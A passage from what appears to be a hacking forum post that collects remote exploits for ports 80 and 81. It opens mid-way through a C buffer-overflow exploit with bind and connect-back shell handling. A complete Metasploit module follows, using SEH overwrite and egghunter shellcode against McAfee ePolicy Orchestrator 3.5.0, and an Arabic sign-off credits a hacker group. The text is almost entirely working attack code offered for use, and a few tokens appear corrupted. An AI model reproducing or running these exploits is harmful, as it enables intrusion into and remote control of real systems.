if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
printe("sumus connection failed.",1);
alarm(0);
printf(" successfully connected: %s:%d.\n",hostname,port);
printf(" sending string: [FILLER][\"GET\"][FILLER][new \"kk\"]"
"[ADDR][EGG]\n");
sleep(1);
write(sock,getbuf(tbl.addr),BUFSIZE);
write(sock,getegg(EGGSIZE),EGGSIZE);
sleep(1);
printf(" closing connection.\n\n");
close(sock);
return(0);
}
signed int getshell_bind_init(unsigned short port){
signed int ssock=0,so=1;
struct sockaddr_in ssa;
ssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));
#ifdef SO_REUSEPORT
setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so));
#endif
ssa.sin_family=AF_INET;
ssa.sin_port=htons(port);
ssa.sin_addr.s_addr=INADDR_ANY;
if(bind(ssock,(struct sockaddr *)&ssa,sizeof(ssa))==-1)
printe("could not bind socket.",1);
listen(ssock,1);
return(ssock);
}
signed int getshell_bind_accept(signed int ssock){
signed int sock=0;
unsigned int salen=0;
struct sockaddr_in sa;
memset((char*)&sa,0,sizeof(struct sockaddr_in));
salen=sizeof(sa);
printf(" awaiting connection from: *:%d.\n",tbl.sport);
alarm(TIMEOUT);
sock=accept(ssock,(struct sockaddr *)&sa,&salen);
alarm(0);
close(ssock);
printf(" connection established. (connect-back)\n");
return(sock);
}
signed int getshell_conn(char *hostname,unsigned short port){
signed int sock=0;
struct hostent *he;
struct sockaddr_in sa;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))= =-1)
printe("getshell_conn(): socket() failed.",1);
sa.sin_family=AF_INET;
if((sa.sin_addr.s_addr=inet_addr(hostname))){
if(!(he=gethostbyname(hostname)))
printe("getshell_conn(): couldn't resolve.",1);
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
sizeof(sa.sin_addr));
}
sa.sin_port=htons(port);
signal(SIGALRM,sig_alarm);
printf(" attempting to connect: %s:%d.\n",hostname,port);
alarm(TIMEOUT);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
printf("[!] connection failed: %s:%d.\n",hostname,port);
exit(1);
}
alarm(0);
printf(" successfully connected: %s:%d.\n\n",hostname,port);
return(sock);
}
void proc_shell(signed int sock){
signed int r=0;
char buf[4096+1];
fd_set fds;
signal(SIGINT,SIG_IGN);
write(sock,"uname -a;id\n",13);
while(1){
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sock,&fds);
if(select(sock+1,&fds,0,0,0)<1)
printe("getshell(): select() failed.",1);
if(FD_ISSET(0,&fds)){
if((r=read(0,buf,4096))<1)
printe("getshell(): read() failed.",1);
if(write(sock,buf,r)!=r)
printe("getshell(): write() failed.",1);
}
if(FD_ISSET(sock,&fds)){
if((r=read(sock,buf,4096))<1)exit(0);
write(1,buf,r);
}
}
close(sock);
return;
}
void printe(char *err,short e){
printf("[!] %s\n",err);
if(e)exit(1);
return;
}
void usage(char *progname){
printf("syntax: %s [-pscrln] -h host\n\n",progname);
printf(" -h <host/ip>\ttarget hostname/ip.\n");
printf(" -p <port>\ttarget port.\n");
printf(" -s <port>\tconnect-back/bind port. (shellcode)\n");
printf(" -c <host/ip>\tconnect-back host/ip. (enables "
"connect-back)\n");
printf(" -r <addr>\tdefine return address. (0x%.8x)\n",tbl.addr);
printf(" -l <value>\tdistance from the start pointer. (\"GET\")\n");
printf(" -n <offset>\tadds to the overwritten \"kk\" integer.\n\n");
exit(0);
}
// [2005-04-14]
81 McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 (Source) Remote Exploit
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::mcafee_epolicy_source;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'McAfee ePolicy Orchestrator / ProtPilot Source Overflow',
'Version' => '$Revision: 1.0 $',
'Authors' =>
[
'muts <muts [at] remote-exploit.org>',
'xbxice[at]yahoo.com',
'H D Moore <hdm [at] metasploit.com>'
],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 81],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' =>
{
# Space is almost unlimited, but 1024 is fine for now
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0b\x0d\x20\x26\x2b\x3d\x25\x8c\x3c\x ff",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This is a stack overflow exploit for McAfee ePolicy Orchestrator 3.5.0
and ProtectionPilot 1.1.0. Tested on Windows 2000 SP4 and Windows 2003 SP1.
This module is based on the exploit by xbxice and muts.
}),
'Refs' =>
[
['URL', 'http://www.remote-exploit.org/advisories/mcafee-epo.pdf' ],
],
'DefaultTarget' => 0,
'Targets' =>
[
['Windows 2000/2003 ePo 3.5.0/ProtectionPilot 1.1.0', 96, 0x601EDBDA], # pop pop ret xmlutil.dll
],
'Keys' => ['epo'],
'DisclosureDate' => 'Jul 17 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
# Use a egghunter stub to find the payload
my $eggtag = Pex::Text::AlphaNumText(4);
my $egghunt =
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02" .
"\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" .
$eggtag .
"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
# Create the 64-byte GUID
my $guid = Pex::Text::AlphaNumText(64);
# Create the 260 byte Source header
my $evil = Pex::Text::AlphaNumText(260);
#
# A long Source header results in a handful of exceptions.
# The first exception occurs with a pointer at offset 116.
# This exception occurs because a function pointer is
# dereferenced from the overwritten data and then called:
# naisp32!naSPIPE_MainWorkFunc+0x3ed:
# mov ecx, [eax+0x270] (eax is offset 116)
# push ecx
# call [eax+0x26c]
#
# When this happens, the first SEH in the chain is also
# overwritten at offset 96, so the exception results
# in our code being called. If we knew of an address
# in memory that pointed to our shellcode, we could
# avoid the SEH completely and use the above call to
# execute our code. This is actually practical, since
# we can upload almost arbitrary amounts of data into
# the heap and then overwrite the function pointer above.
#
# This method is left as an excercise to the reader.
#
# This module will use the SEH overwrite with a pop/pop/ret or
# a jmp/call ebx (2000 only) to gain control of execution. This
# removes the need for a large data upload and should result in
# reliable execution without the need to brute force.
#
# Since the SEH method only leaves ~140 bytes of contiguous
# shellcode space, we use an egghunter to find the real
# payload that we stuffed into the heap as POST data.
#
# Trigger the exception by passing a bad pointer
substr($evil, $target->[1] + 20, 4, Pex::Text::AlphaNumText(3)."\xff");
# Return to pop/pop/ret or *****alent
substr($evil, $target->[1], 4, pack('V', $target->[2]));
# Jump to the egghunter
substr($evil, $target->[1] - 4, 2, "\xeb\x1a");
# Egghunter has 140 bytes of room to work
substr($evil, $target->[1] + 24, length($egghunt), $egghunt);
# Create our post data containing the shellcode
my $data = Pex::Text::AlphaNumText(int(rand(500)+32));
# Embed the search tag and shellcode
$data .= ($eggtag x 2) . $shellcode;
# Add some extra padding
$data .= Pex::Text::AlphaNumText(int(rand(500)+32));
my $req = "GET /spipe/pkg HTTP/1.0\r\n";
$req .="User-Agent: Mozilla/4.0 (compatible; SPIPE/1.0\r\n";
$req .="Content-Length: ". length($data). "\r\n";
$req .="AgentGuid=${guid}\r\n";
$req .="Source=${evil}\r\n";
$req .= "\r\n";
$req .= $data;
$self->PrintLine(sprintf(" Trying ".$target->[0]." using 0x%.8x...", $target->[2]));
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
$s->Send($req);
$self->PrintLine(" Waiting up to two minutes for the egghunter...");
$s->Recv(-1, 120);
$self->Handler($s);
$s->Close;
return;
}
1;
# [2006-10-01]
انتهينا من طرح بورت 81 و 80
شباب لقد تم تجميع ثغرات البورتات وترتيبها
من قبلي لذا
ارجو حفظ الحقوق لجيوش الهكر
تحياتي :wink: